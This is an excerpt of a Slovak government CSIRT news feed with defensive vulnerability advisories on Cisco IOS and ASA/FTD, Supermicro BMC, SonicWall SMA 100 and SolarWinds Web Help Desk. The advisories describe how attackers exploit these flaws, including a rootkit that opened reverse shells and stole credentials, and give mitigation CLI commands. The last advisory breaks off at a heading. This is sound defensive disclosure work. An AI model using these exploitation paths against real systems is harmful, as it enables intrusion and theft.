		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 06 Oct 2025 12:01:41 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2838</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci september 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci september 2025.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/10/2025_09_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 09/2025 PDF (541 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2838/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vládna jednotka CSIRT spustila sériu špecializovaných školení pre policajných vyšetrovateľov: Spoločne posilňujeme obranu proti kyberkriminalite</title>
		<link>/posts/2832</link>
					<comments>/posts/2832#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 03 Oct 2025 13:17:21 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<category><![CDATA[vzdelávanie]]></category>
		<guid isPermaLink="false">/?p=2832</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>Bratislava/Košice, 30. septembra 2025 &#160; Vládna jednotka CSIRT, ktorá patrí pod Ministerstvo investícií, regionálneho rozvoja a&#160;informatizácie Slovenskej republiky v&#160;spolupráci s&#160;odborom...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>Bratislava/Košice, 30. septembra 2025 &nbsp;</p>



<p>Vládna jednotka CSIRT, ktorá patrí pod Ministerstvo investícií, regionálneho rozvoja a&nbsp;informatizácie Slovenskej republiky v&nbsp;spolupráci s&nbsp;odborom počítačovej kriminality a&nbsp;odborom kriminálnej polície Prezídia Policajného zboru, vzdeláva policajtov.</p>



<p>Zaisťovanie digitálnych stôp, bolo prvou témou školenia pre policajných vyšetrovateľov a operatívcov z celého Slovenska, ktoré zorganizovala Vládna jednotka <a href="http://csirt.sk">CSIRT</a> súčasne v Bratislave a Košiciach.</p>



<p>Na podujatí sa celkovo zúčastnilo 30 príslušníkov Policajného zboru, ktorí čelia výzvam kybernetickej kriminality v prvej línii.</p>



<p>Odborné školenie slávnostne otvoril štátny tajomník MIRRI SR pre informatizáciu Radoslav Štefánek, ktorý vo svojom príhovore zdôraznil kľúčový význam spolupráce a zdieľania informácií medzi štátom a bezpečnostnými zložkami. Vyzdvihol tiež ochotu a pripravenosť Vládnej jednotky CSIRT aktívne pomáhať orgánom činným v trestnom konaní, a to formou konzultácií, technickej súčinnosti pri zaisťovaní digitálnych dôkazov, OSINT analýz, forenzných šetrení či analýz hardvéru v našom špecializovanom <a href="https://kyberportal.slovensko.sk/aktuality/vl%C3%A1dna-jednotka-csirt-otvorila-nov%C3%A9-%C5%A1pecializovan%C3%A9-laborat%C3%B3rium-hardv%C3%A9rovej-a-d%C3%A1tovej-anal%C3%BDzy/">chip-off laboratóriu</a>.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="945" height="709" src="/wp-content/uploads/2025/10/obrazok-1.png" alt="" class="wp-image-2834"/></figure>



<p>“Veríme, že spolu proti kybernetickej kriminalite prispejeme k ešte lepšej pripravenosti Policajného zboru čeliť moderným hrozbám v digitálnom priestore. Vládna jednotka CSIRT.SK bude aj naďalej spoľahlivým partnerom v budovaní odolnosti našej krajiny proti kybernetickým hrozbám,” zdôraznil štátny tajomník MIRRI SR Radoslav Štefánek.</p>



<p>Cieľom školenia je odovzdať policajtom praktické zručnosti pri vyšetrovaní kybernetických trestných činov.</p>



<p>Odborníci v kybernetickej bezpečnosti poskytli zúčastneným konkrétne poznatky o tom, aké digitálne dáta sú pri vyšetrovaní kľúčové, ako ich efektívne zabezpečiť, a ako postupovať tak, aby boli použiteľné v trestnoprávnom kontexte.</p>



<p>Každý typ kybernetického incidentu si vyžaduje špecifický prístup k zaisťovaniu dôkazov – či už ide o útoky na IT infraštruktúru, webové služby alebo IoT zariadenia. Dôrazne vysvetlili aj správne procesy, zachovanie integrity dát a pochopenie volatility rôznych typov digitálnych stôp.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="945" height="709" src="/wp-content/uploads/2025/10/obrazok.png" alt="" class="wp-image-2833"/></figure>



<p>V prvom bloku sa policajti oboznámili s tým, aké digitálne stopy možno získať zo systémov napadnutých útokom, ale aj z webových a cloudových služieb či bežných smart zariadení. Nasledoval praktický prehľad techník zaisťovania dôkazov pri phishingových útokoch, bez ohľadu na ich formu – e-mail, SMS (smishing), hlasové hovory (vishing), QR kódy (quishing) či správy na sociálnych sieťach.</p>



<p>Týmto školením sa séria iba začína. V nasledujúcich blokoch sa CSIRT.SK zameria na špecifiká iných typov kybernetickej trestnej činnosti – vrátane kompromitácií infraštruktúr, ransomvérových útokov či pokročilých malvérových kampaní. Účastníci si navyše budú môcť vyskúšať získané poznatky priamo v praxi.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2832/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cisco opravilo aktívne zneužívanú zraniteľnosť operačných systémov IOS a IOS XE</title>
		<link>/posts/2827</link>
					<comments>/posts/2827#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 01 Oct 2025 15:12:25 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[IOS]]></category>
		<category><![CDATA[IOS XE]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2827</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco vydala bezpečnostné aktualizácie, ktoré opravujú 14 zraniteľností operačných systémov Cisco IOS a IOS XE, z čoho jedna je...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco vydala bezpečnostné aktualizácie, ktoré opravujú 14 zraniteľností operačných systémov Cisco IOS a IOS XE, z čoho jedna je označená ako aktívne zneužívaná zero-day. CVE-2025-20352 by vzdialený útočník mohol zneužiť na zneprístupnenie služby, vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Zariadenia Cisco s&nbsp;operačným systémom Cisco IOS a&nbsp;IOS XE bez inštalovanej záplaty z&nbsp;24.09.2025</li>



<li>Prepínače Meraki MS390 a Cisco Catalyst 9300 Series s&nbsp;operačným systémom Meraki CS 17 alebo staršou verziou</li>
</ul>



<p><strong>Pozn.: Zraniteľné sú všetky zariadenia, na ktorých je aktivované SNMP a&nbsp;zraniteľné OID (Object ID) neboli explicitne zakázané v&nbsp;rámci konfigurácie.</strong></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-20352 </strong>(CVSSv3.1 skóre 7,7)</p>



<p>CVE-2025-20352 sa nachádza v<strong> subsystéme</strong> <strong>SNMP (Simple Network Management Protocol)</strong> a&nbsp;spočíva v&nbsp;pretečení zásobníka. Zraniteľnosť možno zneužiť zaslaním špeciálne vytvorených SNMP paketov prostredníctvom IPv4 alebo IPv6. Vzdialený <strong>autentifikovaný útočník</strong> by ju mohol zneužiť na <strong>zneprístupnenie služby</strong>. Vzdialený <strong>autentifikovaný útočník s oprávneniami administrátora</strong> by ju mohol zneužiť aj na <strong>vykonanie kódu</strong> a <strong>získanie úplnej kontroly nad systémom</strong>. Zraniteľnosť v&nbsp;súčasnosti útočníci aktívne zneužívajú.</p>



<p><strong>Pozn.: Na zneužitie zraniteľnosti musí útočník disponovať hodnotou tzv. read-only community string (SNMPv1, SNMPv2c) alebo platnými prihlasovacími údajmi (SNMPv3).</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Zneprístupnenie služby (DoS)</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame bezodkladne vykonať aktualizáciu systémov. Verziu aktualizácií potrebnú pre konkrétne zariadenie je možné zistiť pomocou nástroja <a href="https://sec.cloudapps.cisco.com/security/center/softwarechecker.x">Cisco Software Checker</a>.</p>



<p>V&nbsp;prípade, že aktualizáciu zariadení nie je možné vykonať, zraniteľnosť je možné mitigovať limitovaním prevádzky SNMP len na dôveryhodné zdroje alebo úplným vypnutím SNMP. Administrátori môžu taktiež deaktivovať zraniteľné OID (Object ID) prostredníctvom CLI (Command Line Interface):</p>



<p><code>snmp-server view NO_BAD_SNMP iso included<br>snmp-server view NO_BAD_SNMP snmpUsmMIB excluded<br>snmp-server view NO_BAD_SNMP snmpVacmMIB excluded<br>snmp-server view NO_BAD_SNMP snmpCommunityMIB excluded<br>snmp-server view NO_BAD_SNMP cafSessionMethodsInfoEntry.2.1.111 excluded<br>snmp-server community mycomm view NO_BAD_SNMP RO</code></p>



<p>V prípade SNMPv3 použite príkaz:</p>



<p><code>snmp-server group v3group auth read NO_BAD_SNMP write NO_BAD_SNMP</code></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75296">https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75296</a></li>



<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-x4LPhte">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-x4LPhte</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/cisco-warns-of-ios-zero-day-vulnerability-exploited-in-attacks/">https://www.bleepingcomputer.com/news/security/cisco-warns-of-ios-zero-day-vulnerability-exploited-in-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2827/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti v Supermicro BMC možno zneužiť na modifikáciu firmvéru</title>
		<link>/posts/2824</link>
					<comments>/posts/2824#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 01 Oct 2025 15:09:45 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[BMC]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Supermicro]]></category>
		<guid isPermaLink="false">/?p=2824</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/10/supermicro.png" alt="" /></p>Spoločnosť Supermicro vydala bezpečnostné aktualizácie firmvéru BMC (Baseboard Management Controller), ktoré opravujú dve zraniteľnosti vysokej závažnosti. CVE-2025-7937 a CVE-2025-6198 by...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/10/supermicro.png" alt="" /></p>
<p><strong>Spoločnosť Supermicro vydala bezpečnostné aktualizácie firmvéru BMC (Baseboard Management Controller), ktoré opravujú dve zraniteľnosti vysokej závažnosti. CVE-2025-7937 a CVE-2025-6198 by vzdialený útočník mohol zneužiť na modifikáciu firmvéru zariadenia a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li><strong>Základné dosky</strong> MBD-B12DPT, MBD-B12SPE-CPU-TF, MBD-BH12SSI-M25, MBD-B12DPT-6, MBD-H12SSFF-AN6, MBD-X12DPG-OA6-GD2, MBD-X12DPG-OA6, MBD-B12DPE-6, MBD-B12SPE-CPU-25G, MBD-X12DGQ-R, MBD-X12DPG-QR, MBD-H12DSG-CPU6-TI036, MBD-X12STW-F, MBD-X12STW-TF, MBD-B3ST1-CPU-001, MBD-X13DEM, MBD-X13DET-B, MBD-X13DSF-A, MBD-X13SEDW-F, MBD-X13SEED-F, MBD-X13SEED-SF, MBD-X13SEFR-A, MBD-X13SEM-F, MBD-X13SEM-TF, MBD-X13SET-PT, MBD-X13SEVR-SP13F, MBD-X13OEI-CPU, MBD-B13DEE, MBD-B13DET, MBD-B13SEE-CPU-25G, MBD-B13SEG, MBD-B4SA1-CPU, MBD-B4SC1-CPU, MBD-H13QSH, MBD-H13SRH, MBD-H13SSF, MBD-H13SSH, MBD-G1SMH-G, MBD-G1SMH, MBD-G2DMH-G, MBD-G2DMH-GI, MBD-X13DEH, MBD-X13SAW-F, MBD-X13SAW-TLN4F, MBD-X13SCW-F-B, MBD-X13SCW-F-O, MBD-X13SCW-F, MBD-X14DBM-AP, MBD-X14DBM-APL, MBD-X14DBM-SP, MBD-X14DBT-B, MBD-X14DBT-FAP, MBD-X14DBT-FLAP, MBD-X14QBH+, MBD-X14SBH-AP, MBD-X14SBH, MBD-X14SBM-TF, MBD-X14SBM-TP4F, MBD-X14SDV-20C-SP3F, MBD-X14SDV-32C-SP3F, MBD-X14SDV-36C-SP3F, MBD-X14SDV-36CE-SP3F, MBD-X14SDV-42C-SP3F, MBD-X14SDW-36C-SP9F, MBD-X14SDW-36CE-SP9F, MBD-X14SDW-42C-SP9F, MBD-H13DSG-OM, MBD-B3SD1-20C-25G, MBD-X14SBHM, MBD-B14DBE-AP, MBD-B14DBE, MBD-B14DBT, MBD-B14SBE-CPU-25G, MBD-B14SBE-CPU-AP, MBD-X14DBG-GD, MBD-X14DBG-XAP, MBD-X14SBT-G, MBD-X14SBT-GAP, MBD-H14DSH-TI036, MBD-H14DST-F, MBD-H14DSG-OD, MBD-H14DSG-OM, MBD-X14DBG-MAP, MBD-X14SBGM, MBD-X14DBG-LC+, MBD-X14DBG-LC, MBD-X11DPFF-SNR, MBD-X11DPT-BR, MBB-CMM-003, MBM-CMM-6-01-FI005, MBM-CMM-FIO, MBB-CMM-6, MBM-CMM-6-01-HN004, MBM-CMM-FIO-01-FI005, MBM-CMM-6, MBM-CMM-6-IN001, MBD-X12DPT-B, MBD-X11DGQ, MBD-X11DPD-L, MBD-X11DPD-M25, MBD-X11DPFF-SN, MBD-X11DPL-I, MBD-X11DPS-R, MBD-X11DPS-RE, MBD-X11DPT-L, MBD-X11DSC+, MBD-X11DSF-E, MBD-X11DSF, MBD-X11SCW-F-AM047, MBD-X11SCW-F, MBD-X11SRI-IF <strong>bez najnovšej aktualizácie firmvéru</strong></li>
</ul>



<p><strong>Pozn.: Aktuálne verzie firmvéru pre jednotlivé produkty môžete nájsť na stránke výrobcu v&nbsp;časti „<a href="https://www.supermicro.com/en/support/security_BMC_IPMI_Sept_2025">Affected products</a>“</strong></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-7937, CVE-2025-6198 </strong>(CVSSv3.1 skóre 7,2)</p>



<p>Zraniteľnosti spočívajú v nesprávnom overovaní kryptografických podpisov a podvrhnutím špeciálne vytvoreného obrazu firmvéru ich možno zneužiť na <strong>obídenie bezpečnostných mechanizmov pre inštaláciu firmvéru</strong> a&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p>CVE-2025-7937 obchádza bezpečnostný mechanizmus <strong>RoT (Root of Trust)</strong> a CVE-2025-6198 mechanizmus <strong>Signing Table</strong>. Podľa bezpečnostných výskumníkov z <a href="https://www.binarly.io/blog/broken-trust-fixed-supermicro-bmc-bug-gains-a-new-life-in-two-new-vulnerabilities">Binarly</a>, CVE-2025-7937 obchádza nedostatočnú opravu CVE-2024-10237.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných mechanizmov</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame bezodkladnú aktualizáciu BMC firmvéru na <a href="https://www.supermicro.com/en/support/security_BMC_IPMI_Sept_2025">verzie špecifikované výrobcom</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.supermicro.com/en/support/security_BMC_IPMI_Sept_2025">https://www.supermicro.com/en/support/security_BMC_IPMI_Sept_2025</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-7937">https://www.cve.org/CVERecord?id=CVE-2025-7937</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-6198">https://www.cve.org/CVERecord?id=CVE-2025-6198</a></li>



<li><a href="https://www.binarly.io/blog/broken-trust-fixed-supermicro-bmc-bug-gains-a-new-life-in-two-new-vulnerabilities">https://www.binarly.io/blog/broken-trust-fixed-supermicro-bmc-bug-gains-a-new-life-in-two-new-vulnerabilities</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/new-supermicro-bmc-flaws-can-create-persistent-backdoors/">https://www.bleepingcomputer.com/news/security/new-supermicro-bmc-flaws-can-create-persistent-backdoors/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2824/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Nový firmvér pre zariadenia SonicWall SMA 100 dokáže odstrániť známe rootkity</title>
		<link>/posts/2822</link>
					<comments>/posts/2822#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 01 Oct 2025 15:07:07 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[SMA 100]]></category>
		<category><![CDATA[SonicWall]]></category>
		<guid isPermaLink="false">/?p=2822</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/sonicwall-1.png" alt="" /></p>Spoločnosť SonicWall vydala aktualizáciu firmwaru pre svoje zariadenia série SMA 100, ktorá zavádza pokročilú kontrolu integrity súborov a dokáže identifikovať...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/sonicwall-1.png" alt="" /></p>
<p><strong>Spoločnosť SonicWall vydala aktualizáciu firmwaru pre svoje zariadenia série SMA 100, ktorá zavádza pokročilú kontrolu integrity súborov a dokáže identifikovať a odstrániť známe rootkity. Hackerská skupina UNC6148 zneužívala zraniteľnosti webového servera Apache CVE-2024-38475 a&nbsp;SMA 100 CVE-2025-40599 na šírenie rootkitu OVERSTEP.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Zariadenia SonicWall série SMA 100 (SMA 210, 410, 500v) s&nbsp;firmvérom vo verzii staršej ako 10.2.2.2-92sv</li>
</ul>



<p><strong>Pozn.: SonicWall 1. októbra 2025 ukončil &nbsp;poskytovanie technickej podpory pre SMA 100</strong></p>



<p><strong>Opis:</strong></p>



<p>Nový update firmvéru pre zariadenia SMA (Secure Mobile Access) série SMA 100 zavádza pokročilú kontrolu integrity súborov, pomocou ktorej dokáže identifikovať a odstrániť známe rootkity.</p>



<p>Podľa <a href="https://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor">analýzy GTIG</a> (Google Threat Intelligence Group) z&nbsp;júla 2025 hackerská skupina UNC6148 aktívne zneužívala kritické zraniteľnosti <a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0018">CVE-2024-38475</a>, <a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0014">CVE-2025-40599</a> na infekciu rootkitom OVERSTEP. Malware zabezpečoval perzistentný prístup, vytváral reverzný shell a exfiltroval citlivé údaje ako persist.database, certifikáty, prihlasovacie údaje a OTP seedy. Tie útočníci zneužívali na realizáciu ďalších útokov.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame bezodkladnú aktualizáciu firmvéru zariadení série SMA 100 na verziu 10.2.2.2-92sv. Výrobca taktiež vyzýva na implementáciu odporúčaní z&nbsp;<a href="https://www.sonicwall.com/support/notices/urgent-advisory-for-addressing-rootkits-and-other-critical-vulnerabilities-in-sonicwall-sma-100-series-appliances/250730071322160">júla 2025</a>, ktoré okrem aktualizácie firmvéru vyzývajú aj na reset MFA tokenov a&nbsp;hardening zariadení. Vzhľadom na blížiaci sa dátum ukončenia poskytovania technickej podpory odporúčame včasný prechod na alternatívne produkty s&nbsp;platnou podporou.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0015">https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0015</a></li>



<li><a href="https://www.sonicwall.com/support/notices/urgent-advisory-for-addressing-rootkits-and-other-critical-vulnerabilities-in-sonicwall-sma-100-series-appliances/250730071322160">https://www.sonicwall.com/support/notices/urgent-advisory-for-addressing-rootkits-and-other-critical-vulnerabilities-in-sonicwall-sma-100-series-appliances/250730071322160</a></li>



<li><a href="https://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor">https://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/sonicwall-releases-sma100-firmware-update-to-wipe-rootkit-malware/">https://www.bleepingcomputer.com/news/security/sonicwall-releases-sma100-firmware-update-to-wipe-rootkit-malware/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2822/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>SolarWinds vydáva už tretiu aktualizáciu na opravu kritickej zraniteľnosti v Web Help Desk</title>
		<link>/posts/2820</link>
					<comments>/posts/2820#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 01 Oct 2025 15:05:30 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Solarwinds]]></category>
		<category><![CDATA[Web Help Desk]]></category>
		<guid isPermaLink="false">/?p=2820</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/08/download.png" alt="" /></p>Spoločnosť SolarWinds vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v produkte Web Help Desk. CVE-2025-26399 možno zneužiť na vzdialené vykonanie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/08/download.png" alt="" /></p>
<p><strong>Spoločnosť SolarWinds vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v produkte Web Help Desk. CVE-2025-26399 možno zneužiť na vzdialené vykonanie príkazov a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SolarWinds Web Help Desk vo verziách starších ako 12.8.7 Hotfix 1</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-26399 </strong>(CVSSv3.1 skóre 9,8)</p>



<p>Kritická zraniteľnosť s&nbsp;identifikátorom CVE-2025-26399 sa nachádza v komponente AjaxProxy, ktorý umožňuje nebezpečnú deserializáciu dát. Vzdialený neautentifikovaný útočník by ju mohol zneužiť <strong>na vzdialené vykonávanie príkazov</strong> a <strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p>Zraniteľnosť umožňuje obísť nedostatočnú záplatu pre CVE-2024-28988, ktorá opravovala nedostatočnú záplatu kritickej zraniteľnosti CVE-2024-28986. Americká CISA zaradila CVE-2024-28986 v <a href="https://www.cisa.gov/news-events/alerts/2024/08/15/cisa-adds-one-known-exploited-vulnerability-catalog">auguste 2024</a> do zoznamu aktívne zneužívaných zraniteľností katalógu KEV (Known Exploited Vulnerabilites).</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie príkazov</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame bezodkladnú aktualizáciu Web Help Desk na verziu 12.8.7 Hotfix 1.&nbsp; Kompletný návod môžete nájsť na <a href="https://documentation.solarwinds.com/en/success_center/whd/content/whd_installation_guide.htm">stránke</a> výrobcu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_12-8-7-hotfix-1_release_notes.htm">https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_12-8-7-hotfix-1_release_notes.htm</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/solarwinds-releases-third-patch-to-fix-web-help-desk-rce-bug/">https://www.bleepingcomputer.com/news/security/solarwinds-releases-third-patch-to-fix-web-help-desk-rce-bug/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2820/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cisco v súvislosti so zero-day zraniteľnosťami odporúča bezodkladnú aktualizáciu firewallov ASA a FTD</title>
		<link>/posts/2818</link>
					<comments>/posts/2818#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 29 Sep 2025 12:22:40 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2818</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť CISCO vydala bezpečnostné aktualizácie, ktoré okrem iného opravujú dve aktívne zneužívané zero-day zraniteľnosti vo firewalloch ASA (Adaptive Security Appliance)...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť CISCO vydala bezpečnostné aktualizácie, ktoré okrem iného opravujú dve aktívne zneužívané zero-day zraniteľnosti vo firewalloch ASA (Adaptive Security Appliance) a FTD (Firewall Threat Defense). CVE-2025-20362 možno zneužiť na obídenie mechanizmov autentifikácie a CVE-2025-20333 na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong><u>Zraniteľné systémy:</u></strong></p>



<ul>
<li>Firewally Cisco ASA (Adaptive Security Appliance) s&nbsp;aktívnymi zraniteľnými funkciami AnyConnect IKEv2 Remote Access, Mobile User Security (MUS) alebo SSL VPN</li>



<li>Firewally Cisco FTD (Firewall Threat Defense) s&nbsp;aktívnymi zraniteľnými funkciami AnyConnect IKEv2 Remote Access alebo AnyConnect SSL VPN</li>
</ul>



<p><strong>Pozn.: Konkrétne verzie zraniteľných produktov môžete nájsť prostredníctvom nástroja </strong><a href="https://sec.cloudapps.cisco.com/security/center/softwarechecker.x"><strong>Cisco Software Checker</strong></a><strong>.</strong></p>



<p><strong><u>Opis zraniteľnosti:</u></strong></p>



<p><strong>CVE-2025-20333 </strong>(CVSSv3.1 skóre 9,9)</p>



<p>CVE-2025-20333 sa nachádza v <strong>komponente VPN Web Server</strong> a spočíva v nedostatočnom overovaní používateľských vstupov v HTTP(S) požiadavkách. Vzdialený autentifikovaný útočník s platnými prihlasovacími údajmi VPN by zraniteľnosť zaslaním špeciálne vytvorených HTTP požiadaviek mohol zneužiť na <strong>vzdialené vykonanie kódu</strong> a <strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>CVE-2025-20362 </strong>(CVSSv3.1 skóre 7,7)</p>



<p>CVE-2025-20362 spočíva v nedostatočnom overovaní používateľských vstupov v rámci HTTP(S) požiadaviek s nedostatočnej implementácii mechanizmov autentifikácie. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>obídenie mechanizmov autentifikácie</strong> a&nbsp;získanie prístupu k&nbsp;koncovým bodom URL, ktoré by mali byť prístupné len pre prihlásených používateľov.</p>



<p><strong>CVE-2025-20363 </strong>(CVSSv3.1 skóre 7,7)</p>



<p>CVE-2025-20363 by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených HTTP požiadaviek mohol zneužiť na získanie informácií o systéme a <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong><u>Aktívne zneužívanie zraniteľností CVE-2025-20333 a CVE-2025-20362:</u></strong></p>



